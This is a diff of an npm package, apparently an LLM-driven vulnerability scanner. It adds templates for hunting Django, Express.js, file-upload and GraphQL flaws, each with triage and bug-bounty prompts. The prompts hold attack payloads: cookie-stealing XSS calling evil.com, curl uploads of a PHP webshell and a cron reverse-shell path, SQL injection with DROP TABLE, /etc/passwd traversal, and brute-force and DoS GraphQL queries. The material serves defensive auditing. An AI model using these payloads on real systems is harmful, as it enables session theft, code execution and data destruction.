tryassay 0.33.1 → 0.34.0

package/dist/hunt/templates/django-misconfig.js

@@ -0,0 +1,172 @@
+export const djangoMisconfig = {
+    id: 'django-misconfig',
+    name: 'Django Misconfiguration',
+    cwe: 'CWE-16',
+    filePatterns: [
+        'django',
+        'settings',
+        'views',
+        'urls',
+        'models',
+        'forms',
+        'template',
+        'admin',
+        'ALLOWED_HOSTS',
+        'CSRF',
+        'MIDDLEWARE',
+    ],
+    negativePatterns: ['test', 'tests', 'mock', 'fixture', 'conftest'],
+    minMatchScore: 2,
+    triagePrompt: `You are a security researcher hunting for Django-specific vulnerabilities.
+
+These are framework-level misconfigurations that generic templates miss. Focus on:
+
+1. DEBUG MODE IN PRODUCTION
+   - \`DEBUG = True\` in settings used for production
+   - When DEBUG is True, Django shows full tracebacks with local variables, settings values, and SQL queries
+   - Check for environment-based settings: is there a production settings file? Does it actually set \`DEBUG = False\`?
+   - If using \`django-environ\` or \`python-decouple\`, check the default: \`DEBUG = env.bool('DEBUG', default=True)\` is dangerous
+
+2. ALLOWED_HOSTS MISCONFIGURATION
+   - \`ALLOWED_HOSTS = ['*']\` allows Host header injection
+   - \`ALLOWED_HOSTS = ['.example.com']\` — the leading dot means any subdomain, including attacker-controlled ones if subdomain takeover is possible
+   - Empty \`ALLOWED_HOSTS\` with \`DEBUG = True\` accepts any host
+   - Impact: password reset poisoning, cache poisoning, SSRF via Host header
+
+3. TEMPLATE XSS
+   - \`{{ variable|safe }}\` disables Django's auto-escaping for that variable
+   - \`mark_safe(user_input)\` marks user-controlled strings as safe HTML
+   - \`{% autoescape off %}\` blocks disable escaping for all variables in the block
+   - \`format_html()\` is the CORRECT way — check if \`mark_safe(f"...")\` is used instead
+
+4. MISSING AUTH DECORATORS ON VIEWS
+   - Views without \`@login_required\`, \`@permission_required\`, or \`LoginRequiredMixin\`
+   - Class-based views inheriting \`View\` instead of \`LoginRequiredMixin\`
+   - API views without \`permission_classes\` (Django REST Framework)
+   - Admin views exposed without \`@staff_member_required\`
+
+5. SECRET_KEY EXPOSURE
+   - \`SECRET_KEY\` hardcoded in settings.py (not from environment)
+   - Weak SECRET_KEY (short, dictionary words, common defaults)
+   - Same SECRET_KEY in all environments (dev/staging/prod)
+   - Impact: session forgery, CSRF token prediction, signed cookie tampering
+
+6. DATABASE SECURITY
+   - Raw SQL via \`cursor.execute()\` with string formatting instead of parameterized queries
+   - \`extra()\` or \`raw()\` ORM methods with user input interpolation
+   - \`RawSQL()\` expressions without parameter binding
+   - ORM filter with \`__regex\` or \`__iregex\` using user input (ReDoS)
+
+7. MASS ASSIGNMENT
+   - \`ModelForm\` with \`fields = '__all__'\` includes every model field (including is_admin, is_staff)
+   - \`exclude = ['password']\` instead of explicit \`fields\` list (new fields auto-included)
+   - Serializer (DRF) with \`fields = '__all__'\` — same issue
+   - Check if \`is_staff\`, \`is_superuser\`, \`is_active\` are in form fields
+
+8. SECURITY MIDDLEWARE AND SETTINGS
+   - \`SECURE_SSL_REDIRECT = False\` — no HTTPS enforcement
+   - Missing \`django.middleware.security.SecurityMiddleware\` in MIDDLEWARE
+   - \`CSRF_COOKIE_HTTPONLY = False\` — CSRF token readable by JavaScript
+   - \`SESSION_COOKIE_SECURE = False\` — session sent over HTTP
+   - \`CSRF_TRUSTED_ORIGINS\` with overly broad patterns
+   - \`X_FRAME_OPTIONS\` not set to DENY (clickjacking)
+
+9. ADMIN PANEL EXPOSURE
+   - Admin URL at default \`/admin/\` path (easy to find)
+   - No IP restriction on admin access
+   - Admin with weak password policy or no 2FA
+   - Custom admin views without proper permission checks
+
+KNOWN BYPASS TECHNIQUES:
+- Host header injection for password reset poisoning when ALLOWED_HOSTS = ['*']
+- XSS via |safe filter or mark_safe() on user-controlled input
+- CSRF bypass when CSRF_TRUSTED_ORIGINS includes overly broad domains
+- Debug mode leaking SECRET_KEY, database credentials, and API keys via error pages
+- SQL injection via cursor.execute() with f-strings or .format() instead of %s params
+- Mass assignment escalation: POST is_superuser=true to ModelForm with fields='__all__'
+
+RELEVANT REFERENCES:
+- Django Deployment Checklist (docs.djangoproject.com/en/stable/howto/deployment/checklist/)
+- Django Security documentation (docs.djangoproject.com/en/stable/topics/security/)
+- OWASP Django Security Cheat Sheet`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a Django vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+For each vulnerability type, build a specific attack scenario:
+
+HOST HEADER INJECTION:
+1. Confirm \`ALLOWED_HOSTS = ['*']\` or is empty with DEBUG True
+2. Identify features that use the Host header: password reset, email links, cache keys
+3. Craft request: \`curl -H "Host: evil.com" http://target/accounts/password_reset/\`
+4. Show that the password reset email contains a link to evil.com
+5. Full attack: victim requests reset, attacker intercepts token via poisoned link
+
+TEMPLATE XSS:
+1. Find the template using \`|safe\` or the view using \`mark_safe()\`
+2. Trace the variable back to user input (form field, URL param, database field from user)
+3. Craft payload: submit \`<script>document.location='http://evil.com/?c='+document.cookie</script>\`
+4. Show the rendered HTML with the unescaped script tag
+5. Confirm the XSS fires in a browser context (not inside a textarea or attribute)
+
+SQL INJECTION:
+1. Find \`cursor.execute()\`, \`.extra()\`, \`.raw()\`, or \`RawSQL()\` usage
+2. Confirm user input reaches the query via string formatting (f-string, .format(), % operator)
+3. Craft input that alters the query: \`' OR 1=1 --\`, \`'; DROP TABLE users; --\`
+4. Show the resulting SQL query with the injected payload
+5. Demonstrate data extraction or mutation
+
+MASS ASSIGNMENT:
+1. Find the ModelForm or Serializer with \`fields = '__all__'\` or broad \`exclude\`
+2. Identify sensitive fields on the model (is_staff, is_superuser, is_active, role, balance)
+3. Craft request: POST/PUT with the sensitive field set to an attacker-chosen value
+4. Confirm the field is accepted and saved to the database
+5. Show privilege escalation or data manipulation result
+
+DEBUG MODE INFORMATION DISCLOSURE:
+1. Confirm \`DEBUG = True\` in the settings file used for production
+2. Trigger a 404 or 500 error (visit a non-existent URL, submit invalid data)
+3. Show the debug page contents: local variables, settings, SQL queries
+4. Identify leaked secrets: SECRET_KEY, DATABASE_URL, API keys in settings
+5. Show how SECRET_KEY can be used to forge sessions or CSRF tokens
+
+CSRF BYPASS:
+1. Check \`CSRF_TRUSTED_ORIGINS\` for overly broad patterns
+2. Check if any view uses \`@csrf_exempt\` on state-changing endpoints
+3. For trusted origins bypass: craft a request from a domain that matches the pattern
+4. For csrf_exempt: build a cross-origin form submission PoC
+5. Show the state change performed without valid CSRF token
+
+SEVERITY GUIDANCE:
+- DEBUG True in production with SECRET_KEY leaked: Critical
+- SQL injection via raw queries: Critical
+- Host header injection + password reset poisoning: High
+- Mass assignment to is_superuser: Critical
+- Template XSS via |safe filter: Medium-High
+- Missing auth decorators on sensitive views: High
+- ALLOWED_HOSTS = ['*'] without exploitable Host usage: Medium
+
+RELEVANT REFERENCES:
+- Django deployment checklist (\`python manage.py check --deploy\`)
+- Django security middleware configuration
+- OWASP Testing Guide for Host Header Injection`,
+    knownBypasses: [
+        'Host header injection for password reset poisoning with ALLOWED_HOSTS = [\'*\']',
+        'XSS via |safe filter or mark_safe() on user-controlled strings',
+        'CSRF bypass when CSRF_TRUSTED_ORIGINS includes wildcard subdomains',
+        'Debug mode leaking SECRET_KEY and database credentials on error pages',
+        'SQL injection via cursor.execute() with string formatting instead of parameterized queries',
+        'Mass assignment to is_superuser via ModelForm with fields = \'__all__\'',
+        'Session forgery using leaked SECRET_KEY to sign arbitrary session data',
+        'Admin panel brute force at default /admin/ URL without rate limiting',
+    ],
+    specReferences: [
+        'Django Deployment Checklist (manage.py check --deploy)',
+        'Django Security Documentation',
+        'OWASP Django Security Cheat Sheet',
+        'Django REST Framework Authentication and Permissions',
+        'PEP 506 (secrets module for SECRET_KEY generation)',
+    ],
+    severityRange: ['low', 'critical'],
+};
+//# sourceMappingURL=django-misconfig.js.map

package/dist/hunt/templates/django-misconfig.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"django-misconfig.js","sourceRoot":"","sources":["../../../src/hunt/templates/django-misconfig.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,eAAe,GAA0B;IACpD,EAAE,EAAE,kBAAkB;IACtB,IAAI,EAAE,yBAAyB;IAC/B,GAAG,EAAE,QAAQ;IACb,YAAY,EAAE;QACZ,QAAQ;QACR,UAAU;QACV,OAAO;QACP,MAAM;QACN,QAAQ;QACR,OAAO;QACP,UAAU;QACV,OAAO;QACP,eAAe;QACf,MAAM;QACN,YAAY;KACb;IACD,gBAAgB,EAAE,CAAC,MAAM,EAAE,OAAO,EAAE,MAAM,EAAE,SAAS,EAAE,UAAU,CAAC;IAClE,aAAa,EAAE,CAAC;IAChB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;oCAuEoB;IAElC,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;gDA4D8B;IAE9C,aAAa,EAAE;QACb,iFAAiF;QACjF,gEAAgE;QAChE,oEAAoE;QACpE,uEAAuE;QACvE,4FAA4F;QAC5F,yEAAyE;QACzE,wEAAwE;QACxE,sEAAsE;KACvE;IACD,cAAc,EAAE;QACd,wDAAwD;QACxD,+BAA+B;QAC/B,mCAAmC;QACnC,sDAAsD;QACtD,oDAAoD;KACrD;IACD,aAAa,EAAE,CAAC,KAAK,EAAE,UAAU,CAAC;CACnC,CAAC"}

package/dist/hunt/templates/express-misconfig.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const expressMisconfig: VulnerabilityTemplate;

package/dist/hunt/templates/express-misconfig.js

@@ -0,0 +1,156 @@
+export const expressMisconfig = {
+    id: 'express-misconfig',
+    name: 'Express.js Misconfiguration',
+    cwe: 'CWE-16',
+    filePatterns: [
+        'express',
+        'app.use',
+        'router',
+        'helmet',
+        'bodyparser',
+        'body-parser',
+        'cookie-parser',
+        'express-session',
+    ],
+    negativePatterns: ['test', 'spec', 'mock', '__tests__', 'stories'],
+    minMatchScore: 1,
+    triagePrompt: `You are a security researcher hunting for Express.js-specific vulnerabilities.
+
+These are framework-level misconfigurations that generic templates miss. Focus on:
+
+1. MISSING OR INCOMPLETE HELMET
+   - Is \`helmet()\` used? If not, all default security headers are missing
+   - If used, check for disabled protections: \`helmet({ contentSecurityPolicy: false })\`
+   - Specifically check: Content-Security-Policy, X-Frame-Options, X-Content-Type-Options
+   - Missing HSTS (\`Strict-Transport-Security\`) allows SSL stripping
+
+2. BODY PARSER DENIAL OF SERVICE
+   - \`express.json()\` or \`bodyParser.json()\` without \`{ limit: '...' }\`
+   - Default limit is 100kb but some apps remove it or set it very high
+   - \`express.urlencoded({ extended: true })\` with no limit allows nested object bombs
+   - Check for \`express.raw()\` or \`express.text()\` without limits
+
+3. STATIC FILE SERVING
+   - \`express.static()\` — what directory is being served?
+   - Is it serving the project root? (\`express.static('.')\` or \`express.static(__dirname)\`)
+   - Does the path resolve outside the intended directory? (\`dotfiles: 'allow'\`)
+   - Check for sensitive files in the static directory (.env, package.json, config files)
+
+4. SESSION AND COOKIE SECURITY
+   - \`express-session\` config: check for \`cookie: { secure: true, httpOnly: true, sameSite: 'strict' }\`
+   - Missing \`secure: true\` allows session cookie theft over HTTP
+   - Missing \`httpOnly: true\` allows XSS to steal session cookies
+   - Session secret hardcoded in source code (not from environment)
+   - Default in-memory session store used in production (data loss + no scaling)
+   - Missing \`session.regenerate()\` after login (session fixation)
+
+5. TRUST PROXY MISCONFIGURATION
+   - \`app.set('trust proxy', true)\` trusts ALL proxies — attacker can spoof X-Forwarded-For
+   - Should be \`app.set('trust proxy', 1)\` (trust first proxy) or specific IPs
+   - IP-based rate limiting becomes bypassable when trust proxy is misconfigured
+   - \`req.ip\` and \`req.hostname\` become attacker-controlled
+
+6. ROUTE SECURITY ISSUES
+   - Route parameter pollution: \`/api/users/:id\` — is \`id\` validated as expected type?
+   - Regex routes with catastrophic backtracking: \`app.get(/^(a+)+$/, ...)\` → ReDoS
+   - Order-dependent middleware: auth middleware after the route handler = no auth
+   - \`app.use('/admin', adminRouter)\` — does the admin router have its own auth?
+
+7. ERROR HANDLING
+   - Error handler sending \`err.stack\` or \`err.message\` to client in production
+   - Missing error handler entirely (Express default sends stack traces in dev mode)
+   - Check for \`NODE_ENV\` check in error handler — does it actually hide details in production?
+   - Async route handlers without try-catch or express-async-errors (unhandled rejections)
+
+KNOWN BYPASS TECHNIQUES:
+- IP spoofing via X-Forwarded-For when trust proxy is true
+- Large body payload DoS when no body size limit is set
+- Static file directory traversal via encoded paths (%2e%2e/ or ..%2f)
+- Session fixation: attacker sets session ID before victim logs in
+- Route order bypass: specific route placed after catch-all wildcard
+- Regex DoS: crafted input causes catastrophic backtracking in route pattern
+
+RELEVANT REFERENCES:
+- Express.js Security Best Practices (expressjs.com/en/advanced/best-practice-security.html)
+- Express.js Production Best Practices (expressjs.com/en/advanced/best-practice-performance.html)
+- OWASP Node.js Security Cheat Sheet
+- Helmet.js documentation (helmetjs.github.io)`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for an Express.js vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+For each vulnerability type, build a specific attack scenario:
+
+TRUST PROXY IP SPOOFING:
+1. Confirm \`app.set('trust proxy', true)\` is set (not a number or specific IPs)
+2. Identify features that depend on \`req.ip\`: rate limiting, IP allowlists, logging
+3. Craft request: \`curl -H "X-Forwarded-For: 1.2.3.4" http://target/api/endpoint\`
+4. Demonstrate that \`req.ip\` returns the spoofed value
+5. Show impact: rate limit bypass, IP allowlist bypass, or audit log poisoning
+
+BODY SIZE DOS:
+1. Confirm no \`limit\` option on \`express.json()\` or \`bodyParser.json()\`
+2. Show the default (100kb) or confirm no limit is set
+3. If extended urlencoded is enabled, test nested object: \`a[b][c][d]...[z]=1\` (prototype-style nesting)
+4. Craft payload: \`curl -X POST -H "Content-Type: application/json" -d @large-payload.json http://target/api/endpoint\`
+5. Show impact: memory exhaustion, event loop blocking, or process crash
+
+STATIC FILE EXPOSURE:
+1. Identify the directory passed to \`express.static()\`
+2. List sensitive files that exist in or above that directory
+3. Craft request: \`curl http://target/.env\` or \`curl http://target/package.json\`
+4. If dotfiles option is not 'deny', test: \`curl http://target/.git/config\`
+5. Test path traversal: \`curl http://target/%2e%2e/etc/passwd\` (may work on some OS/versions)
+
+SESSION SECURITY:
+1. Check the \`express-session\` configuration object
+2. For session fixation: show that session ID is NOT regenerated after \`req.login()\`
+3. For insecure cookies: show missing \`secure\`, \`httpOnly\`, or \`sameSite\` flags
+4. For hardcoded secret: show the secret in source code and explain brute-force risk
+5. Demonstrate attack: set session cookie before login, verify it persists after auth
+
+ERROR INFORMATION DISCLOSURE:
+1. Find the error handling middleware (\`app.use((err, req, res, next) => ...)\`)
+2. Check if it sends \`err.stack\`, \`err.message\`, or the full error object
+3. Check if there's a \`NODE_ENV\` gate — and whether NODE_ENV is actually set in production
+4. Trigger an error: invalid JSON body, missing required param, database error
+5. Show the stack trace or internal details in the response
+
+REGEX DOS:
+1. Identify route patterns using regex with quantified groups: \`(a+)+\`, \`(a|b)*c\`
+2. Craft input that causes exponential backtracking
+3. Time the request to show the delay (>5 seconds = confirmed)
+4. Show impact: single request blocks the event loop, all requests hang
+
+SEVERITY GUIDANCE:
+- Trust proxy IP spoofing + rate limit bypass: Medium-High
+- Body size DoS: Medium (requires sustained traffic for real impact)
+- Static file exposing .env with secrets: Critical
+- Session fixation with no regeneration: High
+- Error handler leaking stack traces: Low-Medium
+- Regex DoS: Medium-High (single request blocks all users)
+
+RELEVANT REFERENCES:
+- Express.js trust proxy documentation (explains proxy trust levels)
+- OWASP Session Management Cheat Sheet
+- Node.js Event Loop and DoS prevention`,
+    knownBypasses: [
+        'IP spoofing via X-Forwarded-For with trust proxy set to true',
+        'Body size DoS via unbounded express.json() or urlencoded parser',
+        'Static file directory traversal via encoded path separators (%2e%2e/)',
+        'Session fixation when session.regenerate() not called after login',
+        'Error handler leaking stack traces when NODE_ENV is not set to production',
+        'Route order bypass: catch-all wildcard before specific authenticated routes',
+        'Regex DoS via catastrophic backtracking in route patterns',
+        'Cookie theft over HTTP when secure flag is missing on session cookie',
+    ],
+    specReferences: [
+        'Express.js Security Best Practices',
+        'Express.js Production Performance Best Practices',
+        'OWASP Node.js Security Cheat Sheet',
+        'Helmet.js Documentation',
+        'OWASP Session Management Cheat Sheet',
+    ],
+    severityRange: ['low', 'critical'],
+};
+//# sourceMappingURL=express-misconfig.js.map

package/dist/hunt/templates/express-misconfig.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"express-misconfig.js","sourceRoot":"","sources":["../../../src/hunt/templates/express-misconfig.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,gBAAgB,GAA0B;IACrD,EAAE,EAAE,mBAAmB;IACvB,IAAI,EAAE,6BAA6B;IACnC,GAAG,EAAE,QAAQ;IACb,YAAY,EAAE;QACZ,SAAS;QACT,SAAS;QACT,QAAQ;QACR,QAAQ;QACR,YAAY;QACZ,aAAa;QACb,eAAe;QACf,iBAAiB;KAClB;IACD,gBAAgB,EAAE,CAAC,MAAM,EAAE,MAAM,EAAE,MAAM,EAAE,WAAW,EAAE,SAAS,CAAC;IAClE,aAAa,EAAE,CAAC;IAChB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;+CA4D+B;IAE7C,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;wCA0DsB;IAEtC,aAAa,EAAE;QACb,8DAA8D;QAC9D,iEAAiE;QACjE,uEAAuE;QACvE,mEAAmE;QACnE,2EAA2E;QAC3E,6EAA6E;QAC7E,2DAA2D;QAC3D,sEAAsE;KACvE;IACD,cAAc,EAAE;QACd,oCAAoC;QACpC,kDAAkD;QAClD,oCAAoC;QACpC,yBAAyB;QACzB,sCAAsC;KACvC;IACD,aAAa,EAAE,CAAC,KAAK,EAAE,UAAU,CAAC;CACnC,CAAC"}

package/dist/hunt/templates/file-upload.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const fileUpload: VulnerabilityTemplate;

package/dist/hunt/templates/file-upload.js

@@ -0,0 +1,131 @@
+export const fileUpload = {
+    id: 'file-upload',
+    name: 'Unrestricted File Upload',
+    cwe: 'CWE-434',
+    filePatterns: ['upload', 'file', 'multipart', 'formdata', 'multer', 'busboy', 'attachment', 'storage', 'blob', 'image'],
+    negativePatterns: [],
+    triagePrompt: `You are a security researcher hunting for unrestricted file upload vulnerabilities.
+
+Analyze the code for file upload handlers that fail to properly validate uploaded files, allowing an attacker to upload malicious content. Focus on:
+
+1. Missing file type validation — is the Content-Type header or file extension checked?
+2. Client-side only validation — is validation done in JavaScript but not enforced server-side?
+3. MIME type trust — does the server trust the Content-Type header without verifying file magic bytes?
+4. Extension bypass — can .php.jpg, .asp;.jpg, or null byte tricks bypass extension checks?
+5. Path traversal via filename — is the original filename used for storage? Can ../../etc/cron.d/shell work?
+6. Missing size limits — can an attacker upload arbitrarily large files for DoS?
+7. Executable upload — can .php, .jsp, .aspx, .sh files be uploaded to a web-accessible directory?
+8. SVG upload — SVGs can contain JavaScript (XSS) and external entity references (XXE/SSRF)
+9. Image processing exploits — ImageMagick (ImageTragick CVE-2016-3714), Pillow, sharp with crafted files
+
+DANGEROUS PATTERNS:
+- Storing files in the web root with original filename
+- Using user-supplied filename in fs.writeFile()/os.path.join() without sanitization
+- Checking extension with simple string matching: filename.endsWith('.jpg') (bypassable with .jpg.php)
+- Trusting req.file.mimetype (set by client, not verified server-side)
+- No file size limit in multer/busboy configuration
+- Serving uploaded files with user-controlled Content-Type header
+
+SAFE PATTERNS (not vulnerable):
+- Magic byte verification: checking file header matches expected type
+- Generated filenames: UUID + allowlisted extension, never using user-supplied name
+- Storage outside web root: files served through a controller that sets Content-Type
+- Content-Disposition: attachment header on download (prevents browser execution)
+- Image re-encoding: re-save image through canvas/sharp to strip payloads
+- Cloud storage with no-execute: S3/GCS with proper ACLs, not serving from app server
+
+KNOWN BYPASS TECHNIQUES:
+- Double extension: shell.php.jpg (Apache may execute as PHP depending on config)
+- Null byte: shell.php%00.jpg (terminates string in C-based parsers)
+- Case variation: shell.PhP, shell.pHP (case-insensitive filesystems)
+- MIME type spoofing: set Content-Type to image/jpeg while uploading PHP file
+- Polyglot files: valid JPEG that is also valid PHP/HTML
+- .htaccess upload: upload .htaccess to change server-side execution rules
+- SVG with embedded JavaScript: <svg onload="alert(1)">
+- Content-Type override: upload declares image/jpeg, server stores it, serves with original type
+
+RELEVANT SPECIFICATIONS:
+- OWASP Top 10 2021 A04: Insecure Design
+- CWE-434: Unrestricted Upload of File with Dangerous Type
+- CWE-22: Path Traversal (via filename)
+- RFC 7578: Returning Values from Forms: multipart/form-data
+
+For each finding, cite the EXACT upload handler code, what validation is missing, and what file type an attacker could upload.`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for an unrestricted file upload vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+VERIFICATION STEPS:
+1. Locate the upload endpoint and handler function
+2. Check what validation exists:
+   - File extension check? (server-side or client-only?)
+   - MIME type verification? (header-based or magic byte-based?)
+   - File size limit? (what is it?)
+   - Filename sanitization? (path traversal prevention?)
+3. Determine where files are stored:
+   - Web-accessible directory? (can uploaded files be requested directly?)
+   - Cloud storage? (what ACLs/permissions?)
+   - Local filesystem? (what path construction?)
+4. Determine how files are served:
+   - Direct static file serving? (server may execute .php/.jsp)
+   - Controller-based serving? (Content-Type set by code, not filename)
+   - Content-Disposition header present? (attachment vs inline)
+
+ATTACK SCENARIOS:
+1. Remote Code Execution: Upload .php/.jsp/.aspx to web root, access directly
+2. Cross-Site Scripting: Upload SVG/HTML with JavaScript, victim loads the URL
+3. Path Traversal: Filename ../../config/cron.d/reverse-shell overwrites system files
+4. Denial of Service: Upload multi-GB file without size limit
+5. Server-Side Request Forgery: Upload SVG with external entity pointing to internal service
+6. Stored XSS: Upload HTML file, served inline without Content-Disposition
+
+PROOF-OF-CONCEPT:
+\`\`\`bash
+# Upload a PHP webshell disguised as image
+curl -X POST /api/upload \\
+  -F "file=@shell.php;type=image/jpeg;filename=avatar.php.jpg"
+
+# Upload SVG with XSS
+curl -X POST /api/upload \\
+  -F 'file=@xss.svg;type=image/svg+xml' \\
+  # xss.svg contains: <svg><script>document.location="https://evil.com/"+document.cookie</script></svg>
+
+# Path traversal via filename
+curl -X POST /api/upload \\
+  -F 'file=@shell.sh;filename=../../../etc/cron.d/reverse-shell'
+\`\`\`
+
+SEVERITY ASSESSMENT:
+- Critical: RCE via executable upload to web-accessible directory
+- Critical: Path traversal overwriting system files
+- High: Stored XSS via SVG/HTML upload
+- High: SSRF via SVG external entity
+- Medium: DoS via unlimited file size
+- Medium: Overwriting other users' uploads via predictable filenames
+- Low: MIME type confusion without direct security impact
+
+RELEVANT SPECIFICATIONS:
+- CWE-434: Unrestricted Upload of File with Dangerous Type
+- CWE-22: Improper Limitation of a Pathname to a Restricted Directory
+
+Cite exact file paths, line numbers, the missing validation, and the specific attack vector.`,
+    knownBypasses: [
+        'Double extension: shell.php.jpg executed as PHP by misconfigured Apache',
+        'Null byte injection: shell.php%00.jpg truncates at null byte',
+        'MIME type spoofing: Content-Type set to image/jpeg for PHP file',
+        'Polyglot file: valid JPEG header followed by PHP code',
+        '.htaccess upload: change execution rules for the upload directory',
+        'SVG with JavaScript: <svg onload="..."> for stored XSS',
+        'Path traversal in filename: ../../etc/cron.d/backdoor',
+        'Case variation: .PhP, .pHP on case-insensitive filesystems',
+    ],
+    specReferences: [
+        'CWE-434 (Unrestricted Upload of File with Dangerous Type)',
+        'CWE-22 (Path Traversal)',
+        'OWASP Top 10 2021 A04 (Insecure Design)',
+        'RFC 7578 (multipart/form-data)',
+        'OWASP File Upload Cheat Sheet',
+    ],
+    severityRange: ['medium', 'critical'],
+};
+//# sourceMappingURL=file-upload.js.map

package/dist/hunt/templates/file-upload.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"file-upload.js","sourceRoot":"","sources":["../../../src/hunt/templates/file-upload.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,UAAU,GAA0B;IAC/C,EAAE,EAAE,aAAa;IACjB,IAAI,EAAE,0BAA0B;IAChC,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,QAAQ,EAAE,MAAM,EAAE,WAAW,EAAE,UAAU,EAAE,QAAQ,EAAE,QAAQ,EAAE,YAAY,EAAE,SAAS,EAAE,MAAM,EAAE,OAAO,CAAC;IACvH,gBAAgB,EAAE,EAAE;IACpB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;+HA8C+G;IAE7H,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6FAyD2E;IAE3F,aAAa,EAAE;QACb,yEAAyE;QACzE,8DAA8D;QAC9D,iEAAiE;QACjE,uDAAuD;QACvD,mEAAmE;QACnE,wDAAwD;QACxD,uDAAuD;QACvD,4DAA4D;KAC7D;IACD,cAAc,EAAE;QACd,2DAA2D;QAC3D,yBAAyB;QACzB,yCAAyC;QACzC,gCAAgC;QAChC,+BAA+B;KAChC;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,UAAU,CAAC;CACtC,CAAC"}

package/dist/hunt/templates/graphql-abuse.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const graphqlAbuse: VulnerabilityTemplate;

package/dist/hunt/templates/graphql-abuse.js

@@ -0,0 +1,161 @@
+export const graphqlAbuse = {
+    id: 'graphql-abuse',
+    name: 'GraphQL Abuse',
+    cwe: 'CWE-200',
+    filePatterns: ['graphql', 'query', 'mutation', 'resolver', 'schema', 'gql', 'apollo', 'typegraphql', 'nexus', 'pothos'],
+    negativePatterns: [],
+    triagePrompt: `You are a security researcher hunting for GraphQL-specific vulnerabilities.
+
+Analyze the code for GraphQL configuration and resolver implementations that expose the API to abuse. Focus on:
+
+1. INTROSPECTION ENABLED IN PRODUCTION:
+   - Is the __schema query accessible? (allows full API discovery)
+   - Check: introspection: false in server config
+   - Apollo Server: introspection defaults to true in non-production
+   - express-graphql: introspection always defaults to true
+
+2. NO QUERY DEPTH LIMIT:
+   - Can an attacker nest queries deeply? { user { friends { friends { friends { ... } } } } }
+   - Check for graphql-depth-limit, graphql-query-complexity, or custom depth limiting
+   - Without limits: a single query can cause exponential database joins → DoS
+
+3. NO QUERY COMPLEXITY LIMIT:
+   - Can an attacker request all fields on all relations in one query?
+   - Check for cost analysis middleware
+   - A single query requesting 10,000 records with all nested relations = server crash
+
+4. BATCH QUERY ATTACKS:
+   - Does the server accept arrays of queries? [{ query: "..." }, { query: "..." }, ...]
+   - Batch brute-force: send 1000 login mutations in one HTTP request to bypass rate limiting
+   - Check: array input handling, batch processing limits
+
+5. FIELD-LEVEL AUTHORIZATION MISSING:
+   - Are sensitive fields (email, phone, SSN, role, balance) accessible to all authenticated users?
+   - Check: per-resolver auth decorators, field-level middleware, directive-based auth
+   - Common pattern: query-level auth exists but resolver-level auth is missing
+
+6. MUTATION AUTHORIZATION GAPS:
+   - Can a regular user call admin mutations (deleteUser, changeRole, updateConfig)?
+   - Check: auth checks in mutation resolvers, not just queries
+
+7. INFORMATION LEAKAGE:
+   - Do error messages expose internal schema details, stack traces, or SQL queries?
+   - Does the debug/playground endpoint exist in production?
+   - Are suggested field names shown in error messages? ("Did you mean 'secretField'?")
+
+8. ALIAS ABUSE:
+   - GraphQL aliases allow the same field to be queried multiple times with different arguments
+   - Bypass rate limiting: { a: login(user:"admin",pass:"pass1") b: login(user:"admin",pass:"pass2") ... }
+   - Bypass IDOR checks: { a: user(id:1) b: user(id:2) c: user(id:3) } — fetch multiple users in one request
+
+KNOWN BYPASS TECHNIQUES:
+- Introspection via fragments: __type queries even when __schema is blocked
+- Persisted queries bypass: if server allows arbitrary queries alongside persisted ones
+- Alias-based brute force: 1000 password attempts in one request using aliases
+- Nested fragment cycles: fragment A spreads B, fragment B spreads A → DoS
+- Subscription abuse: open thousands of subscriptions to exhaust server resources
+- Batch mutations: wrap destructive operations in a single request to avoid audit logging
+
+RELEVANT SPECIFICATIONS:
+- GraphQL Specification Section 4 (Introspection)
+- OWASP GraphQL Cheat Sheet
+- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
+- CWE-770: Allocation of Resources Without Limits
+
+For each finding, cite the EXACT configuration or resolver code, and describe the specific abuse scenario.`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a GraphQL vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+VERIFICATION STEPS:
+1. For introspection: confirm __schema query returns full schema in production environment
+2. For depth/complexity: construct a query that would cause exponential work and confirm no limit rejects it
+3. For auth gaps: identify the resolver and confirm no auth middleware exists between query and data access
+4. For batch attacks: confirm the server accepts array payloads and processes all entries
+5. For alias abuse: confirm aliases work for the target operation (login, data access)
+
+PROOF-OF-CONCEPT:
+
+Introspection dump:
+\`\`\`graphql
+{
+  __schema {
+    types { name fields { name type { name } } }
+    queryType { fields { name } }
+    mutationType { fields { name } }
+  }
+}
+\`\`\`
+
+Depth attack (DoS):
+\`\`\`graphql
+{
+  users {
+    friends {
+      friends {
+        friends {
+          friends {
+            friends {
+              id name email
+            }
+          }
